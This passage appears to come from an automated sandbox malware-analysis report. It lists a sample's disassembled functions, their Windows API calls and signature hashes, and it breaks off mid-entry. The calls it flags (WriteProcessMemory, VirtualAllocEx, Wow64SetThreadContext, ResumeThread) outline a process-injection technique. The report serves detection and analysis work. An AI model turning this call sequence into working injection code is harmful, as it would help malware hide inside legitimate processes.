                                                                                    • Instruction Fuzzy Hash: 1A7114B0A00B058FDB24DF29D15575ABBF1FB88304F10896DE48AE7A50D779E849CF92
                                                                                    Function 00B6449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 204 b6449c-b659b9 CreateActCtxA 207 b659c2-b65a1c 204->207 208 b659bb-b659c1 204->208 215 b65a1e-b65a21 207->215 216 b65a2b-b65a2f 207->216 208->207 215->216 217 b65a40 216->217 218 b65a31-b65a3d 216->218 220 b65a41 217->220 218->217 220->220
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B659A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 89ae8623c66648cb58bce067894b60fe9d78ca37d787305835b9a7617b2b3927
                                                                                    • Instruction ID: 4d1189303e7778cfb12fe0371e2bd6f08a77c0ed5aafde9cb8ec500294d1647f
                                                                                    • Opcode Fuzzy Hash: 89ae8623c66648cb58bce067894b60fe9d78ca37d787305835b9a7617b2b3927
                                                                                    • Instruction Fuzzy Hash: 8241A1B1D0071DCBEB24DFA9C98479DBBF5BF48304F20816AD408AB251DB756946CF60
                                                                                    Function 00B658F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 221 b658f0 222 b658fc-b659b9 CreateActCtxA 221->222 224 b659c2-b65a1c 222->224 225 b659bb-b659c1 222->225 232 b65a1e-b65a21 224->232 233 b65a2b-b65a2f 224->233 225->224 232->233 234 b65a40 233->234 235 b65a31-b65a3d 233->235 237 b65a41 234->237 235->234 237->237
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B659A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 57d9911a85c4e898905ec985e9bd71a989b187c67b8888ce9d9f77c6b265d6f9
                                                                                    • Instruction ID: c02ec4500ccf599ce7656fa95ba47559f974dec4a826e65f85772f34e15c2e7d
                                                                                    • Opcode Fuzzy Hash: 57d9911a85c4e898905ec985e9bd71a989b187c67b8888ce9d9f77c6b265d6f9
                                                                                    • Instruction Fuzzy Hash: 1D41BDB0D00719CBEB24DFA9C98478DBBF6BF48304F20816AD418AB251DB756946CF60
                                                                                    Function 0524790C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 238 524790c-5248e9c 240 5248ea7-5248eb6 238->240 241 5248e9e-5248ea4 238->241 242 5248eb8 240->242 243 5248ebb-5248ef4 DrawTextExW 240->243 241->240 242->243 244 5248ef6-5248efc 243->244 245 5248efd-5248f1a 243->245 244->245
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05248E35,?,?), ref: 05248EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1415346913.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_5240000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: 257cc2f9dacf163394261e94ca92a81485eb5efaaf88ccf2068fd8bbb833b3cb
                                                                                    • Instruction ID: ea9067609b7ba29e029ecaf695223db47f92d0e1466a85a7ebb94c8716f7ac0d
                                                                                    • Opcode Fuzzy Hash: 257cc2f9dacf163394261e94ca92a81485eb5efaaf88ccf2068fd8bbb833b3cb
                                                                                    • Instruction Fuzzy Hash: 9731E2B5D1030A9FDB14CF9AD880AAEBBF5FF48214F14842AE919A7210D775A940CFA4
                                                                                    Function 05248E48 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 248 5248e48-5248e9c 249 5248ea7-5248eb6 248->249 250 5248e9e-5248ea4 248->250 251 5248eb8 249->251 252 5248ebb-5248ef4 DrawTextExW 249->252 250->249 251->252 253 5248ef6-5248efc 252->253 254 5248efd-5248f1a 252->254 253->254
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05248E35,?,?), ref: 05248EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1415346913.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_5240000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: b398b03c2c21b3ea15372f32c00bc532bef7227682e5f6cbc13b6cd62f375e46
                                                                                    • Instruction ID: 94d318c79b89e9103b7c16447f1397d4218bb18b5d8b36f17b619fb2e32db314
                                                                                    • Opcode Fuzzy Hash: b398b03c2c21b3ea15372f32c00bc532bef7227682e5f6cbc13b6cd62f375e46
                                                                                    • Instruction Fuzzy Hash: 5231E0B6D1034A9FDB15CF9AD880AEEBBF5BF48310F14842AE919A7210D374A540CFA4
                                                                                    Function 06C1CD80 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 257 6c1cd80-6c1cdce 259 6c1cdd0-6c1cddc 257->259 260 6c1cdde-6c1ce1d WriteProcessMemory 257->260 259->260 262 6c1ce26-6c1ce56 260->262 263 6c1ce1f-6c1ce25 260->263 263->262
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C1CE10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: c542bff7af9f30ca8cf404e15fa7b575d44b7afb3b549d1f48b4f91e0e74b1d9
                                                                                    • Instruction ID: 389e4427d085f43962f90231fb0c336c6a01c9f659cd200b542ed56dff0583e3
                                                                                    • Opcode Fuzzy Hash: c542bff7af9f30ca8cf404e15fa7b575d44b7afb3b549d1f48b4f91e0e74b1d9
                                                                                    • Instruction Fuzzy Hash: 972126B1D003099FDB10CFAAC881BDEBBF5FF48310F10842AE918A7240C7789950DBA4
                                                                                    Function 06C1CE70 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 277 6c1ce70-6c1cefd ReadProcessMemory 280 6c1cf06-6c1cf36 277->280 281 6c1ceff-6c1cf05 277->281 281->280
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C1CEF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: f0c1d1e585bf89d7c81bd25b34a7ae9f0443eb47aabd421b054c7b56a80dc30d
                                                                                    • Instruction ID: c294d1bc628ca2828618dc4f800decb5360dfa8cec6c4f5ff69f6fb09772692b
                                                                                    • Opcode Fuzzy Hash: f0c1d1e585bf89d7c81bd25b34a7ae9f0443eb47aabd421b054c7b56a80dc30d
                                                                                    • Instruction Fuzzy Hash: C62105B1C003599FDB10CFAAC840BDEBBF5BF48310F10842AE919A7240C7799540DBA5
                                                                                    Function 06C1CBE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 267 6c1cbe8-6c1cc33 269 6c1cc43-6c1cc73 Wow64SetThreadContext 267->269 270 6c1cc35-6c1cc41 267->270 272 6c1cc75-6c1cc7b 269->272 273 6c1cc7c-6c1ccac 269->273 270->269 272->273
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1CC66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: cd41d02c083988a6fa2e04f2beefa26501da5081cc82b50a50db53ebce24e9a3
                                                                                    • Instruction ID: 58b70a3a6d42ce61c6ea1cc638fe3d9f61d0836b8cd335578fa302d5749d7a6e
                                                                                    • Opcode Fuzzy Hash: cd41d02c083988a6fa2e04f2beefa26501da5081cc82b50a50db53ebce24e9a3
                                                                                    • Instruction Fuzzy Hash: 75213871D003098FDB24DFAAC484BEEBBF4EF48214F14842EE419A7240C7789945CFA5
                                                                                    Function 00B6D3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 285 b6d3a0-b6d434 DuplicateHandle 286 b6d436-b6d43c 285->286 287 b6d43d-b6d45a 285->287 286->287
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c261ce39a6dfe16b95d23c57fd76e9ecd7d2d454654fdbd943182bd165c4407b
                                                                                    • Instruction ID: f344d7c2b8e7d16a76fedf01fcfa0521588902951b86b8a119cf1a2bec572116
                                                                                    • Opcode Fuzzy Hash: c261ce39a6dfe16b95d23c57fd76e9ecd7d2d454654fdbd943182bd165c4407b
                                                                                    • Instruction Fuzzy Hash: 8B21C4B5D002499FDB10CFAAD984ADEBBF8FB48314F14841AE914A7350D379A944CF65
                                                                                    Function 06C1CCC0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 290 6c1ccc0-6c1cd3b VirtualAllocEx 293 6c1cd44-6c1cd69 290->293 294 6c1cd3d-6c1cd43 290->294 294->293
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C1CD2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1aab626a53a692d2fcce286638e2928f7ad5cba20595b0cfb78d97e133de2cf1
                                                                                    • Instruction ID: a9fb64456a9e758b6999ca1c637f0cc2de0a62108b356e96e76afd8db8f361d0
                                                                                    • Opcode Fuzzy Hash: 1aab626a53a692d2fcce286638e2928f7ad5cba20595b0cfb78d97e133de2cf1
                                                                                    • Instruction Fuzzy Hash: 1E112672C002499FDB24DFAAC844BDFBBF5AB48314F14841AE515A7250C779A540CBA5
                                                                                    Function 06C1CB38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 298 6c1cb38-6c1cba7 ResumeThread 301 6c1cbb0-6c1cbd5 298->301 302 6c1cba9-6c1cbaf 298->302 302->301
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 5d89eb3c8ae81f9e56c625b6ab1c098b04ff5fbbbf30d70eebd1a1121dcc834f
                                                                                    • Instruction ID: 488792152e248deae261239dd2c74b60bfe9f84c03e2452d6b35115c6aad94ac
                                                                                    • Opcode Fuzzy Hash: 5d89eb3c8ae81f9e56c625b6ab1c098b04ff5fbbbf30d70eebd1a1121dcc834f
                                                                                    • Instruction Fuzzy Hash: 1E113AB1D003498FDB24DFAAC444BDFFBF4AB48214F24841ED419A7240C779A540CBA9
                                                                                    Function 00B6B0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 306 b6b0c0-b6b100 307 b6b102-b6b105 306->307 308 b6b108-b6b133 GetModuleHandleW 306->308 307->308 309 b6b135-b6b13b 308->309 310 b6b13c-b6b150 308->310 309->310
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: a1dc329b06e343b49cf9da2d0c5d9f38b7484df45e8d1a9149f92a9bebf77b3e
                                                                                    • Instruction ID: 1c2028920ce9d5ac9186eed6909c2b5c7c5eb1df5562bb6fd5f10f13305f1c81
                                                                                    • Opcode Fuzzy Hash: a1dc329b06e343b49cf9da2d0c5d9f38b7484df45e8d1a9149f92a9bebf77b3e
                                                                                    • Instruction Fuzzy Hash: 43110FB6C002499FDB20CF9AC844BDEFBF4EB89314F10845AD428B7200D379A585CFA5
                                                                                    Function 00B6B159 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: b5528329f61244ec2720d10dce5cdbd6c747f4c5ce9fce8f7a4956b089229798
                                                                                    • Instruction ID: 40468cce665631276e0aedf3c5a43e3c48883388f646a92a6dd2e8e60702d04b
                                                                                    • Opcode Fuzzy Hash: b5528329f61244ec2720d10dce5cdbd6c747f4c5ce9fce8f7a4956b089229798
                                                                                    • Instruction Fuzzy Hash: E1F037B68043548FEB11DF99E404BDEBBF0AF4A314F14848AD458AB262C379A589CF65
                                                                                    Function 0B411B27 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: f174de91bd6f28bc212eae07041bb8adffbf4b60033392ea4b1ebcb856470eaa
                                                                                    • Instruction ID: 5ead4d709b21cd43d47cff2b84eed3ceb26b095ae4cb6d5c84003187d99c1d5b
                                                                                    • Opcode Fuzzy Hash: f174de91bd6f28bc212eae07041bb8adffbf4b60033392ea4b1ebcb856470eaa
                                                                                    • Instruction Fuzzy Hash: B0C0803091B10CE7C600DB91DE0156D775C9B00940F4041C7550913200E9351F115592
                                                                                    Function 0B411B28 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: 4d3a561061bc4802fa560a106307615eee1c035fc2bc4785823aaf9bc7012ddb
                                                                                    • Instruction ID: b1ec21f01ba6608bece7863be5b4dd5c41edb9c3235151d283887fe7d3db5a2e
                                                                                    • Opcode Fuzzy Hash: 4d3a561061bc4802fa560a106307615eee1c035fc2bc4785823aaf9bc7012ddb
                                                                                    • Instruction Fuzzy Hash: 7CC08C30A1A10CE7C600EB81DA0152CB3AC9B00A80F4082C78A0A23200EA3A2F229682
                                                                                    Function 009AD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a436710c4f8abc11081f2857e09b5762b868023540938ca5e5940ef035d2b97
                                                                                    • Instruction ID: df68fe9ef1bee0ce0018069bb06090586741a035aa8cfdb61d9a9eb242c17cf5
                                                                                    • Opcode Fuzzy Hash: 2a436710c4f8abc11081f2857e09b5762b868023540938ca5e5940ef035d2b97
                                                                                    • Instruction Fuzzy Hash: CD212871505304DFDF14DF10D9C4B16BBA5FB99314F20C569E90A0F6A6C33AE856CAE2
                                                                                    Function 009AD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bdcc4c45e837a8c8cf68f8176766d64804b108f15b4296aec9d5009a0a7f0da
                                                                                    • Instruction ID: d688c68bfde31a8c689ee35aab402677f83abfce023ccac0cc0e7958ae89e2d3
                                                                                    • Opcode Fuzzy Hash: 0bdcc4c45e837a8c8cf68f8176766d64804b108f15b4296aec9d5009a0a7f0da
                                                                                    • Instruction Fuzzy Hash: F6212871905240DFDB15DF10D9C0B26BFA5FB89318F24C569F8060B65AC336D856DBE2
                                                                                    Function 009CD01C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d5a7dc55f40e7688f567e46dc048740e171fafd53bce8559a8aeb52142bf391
                                                                                    • Instruction ID: a6064d35cd34722a79b8bc012ea5a82d90140d09bf0f539a656a21799f150f36
                                                                                    • Opcode Fuzzy Hash: 0d5a7dc55f40e7688f567e46dc048740e171fafd53bce8559a8aeb52142bf391
                                                                                    • Instruction Fuzzy Hash: B321D371905200EFDB14DF28D5C4F16BBA5FB84314F20C97DE84A4B296C33AD847CA62
                                                                                    Function 009CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bd7a2f3c85c86b3a07060b285bb11c92c99fbefe9f2da8e5ac1674b605d43a0f
                                                                                    • Instruction ID: 48f2f158f7bf403efcebe20beb52a38bcb70b68874af7a5e1f4e5559feb5eaa9
                                                                                    • Opcode Fuzzy Hash: bd7a2f3c85c86b3a07060b285bb11c92c99fbefe9f2da8e5ac1674b605d43a0f
                                                                                    • Instruction Fuzzy Hash: D721F271905200EFDB15DF20D9C0F26BBA5FB84314F24C97DE8594B292C33AD846CA62
                                                                                    Function 009CD006 Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b7188a7a0e8e56b64bb50da0136c9ceadbf43d41c07259e0b3615cb9617f2ac
                                                                                    • Instruction ID: 54bbc815789845289b2c66ad42f1fd997ffb530855d58dc4ae597180461683a1
                                                                                    • Opcode Fuzzy Hash: 1b7188a7a0e8e56b64bb50da0136c9ceadbf43d41c07259e0b3615cb9617f2ac
                                                                                    • Instruction Fuzzy Hash: 83215E755093809FDB12CF24D994B15BF71EB46314F28C5EED8498F6A7C33A980ACB62
                                                                                    Function 009AD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction ID: f9a98cbeda1248d1825a7912f085c37fe10201cb67234e9a1aa9bbb0b7bbe4ab
                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction Fuzzy Hash: 4111D376504240DFDB15CF10D5C4B16BFB2FB99324F24C6A9D90A0BA66C33AE856CBE1
                                                                                    Function 009AD4BF Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction ID: 46153fbedb802126eada432b76bc6ceff827dc1ec7e5afe49c4e65e1f9efb41d
                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                    • Instruction Fuzzy Hash: 5011D376904280CFCB15CF10D5C4B16BF71FB94318F24C6A9E84A0BA5AC336D956CBA1
                                                                                    Function 009CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction ID: bd12d2b359763855644cacc66b13c959db6a823f30e5984d0c545048539de6ef
                                                                                    • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                    • Instruction Fuzzy Hash: 6D119D76904280DFDB15CF10D9C4B15FBB1FB84314F24C6AED8494B696C33AD84ACB62
                                                                                    Function 0B411CE9 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d11a6a5881c51f8c8104ef09d70d5a229e595c25cf28fc8e76abdf0b4c885ab
                                                                                    • Instruction ID: 1f7c872787558d74bfee32088c3c60d79178f2e663654de6955f57136ef43928
                                                                                    • Opcode Fuzzy Hash: 7d11a6a5881c51f8c8104ef09d70d5a229e595c25cf28fc8e76abdf0b4c885ab
                                                                                    • Instruction Fuzzy Hash: 86F027312097C00FC3078B36A4104967FF2EFCF211B0A48EBF045CB262DB285C0A8761
                                                                                    Function 0B411D00 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cca4c7d33096d0b149461458fdc6e9472c1f73a7552296826c27c1fbbdfd8532
                                                                                    • Instruction ID: 17b5a9ae0b33b7d33bd405f6aec085f0ff11ee44c5125dc41da19499b09e52ef
                                                                                    • Opcode Fuzzy Hash: cca4c7d33096d0b149461458fdc6e9472c1f73a7552296826c27c1fbbdfd8532
                                                                                    • Instruction Fuzzy Hash: 08E04F357006145BC7198B2AE44499BB7EAEFC9612715846EF11A9B320CF21A9058750
                                                                                    Function 0B410325 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
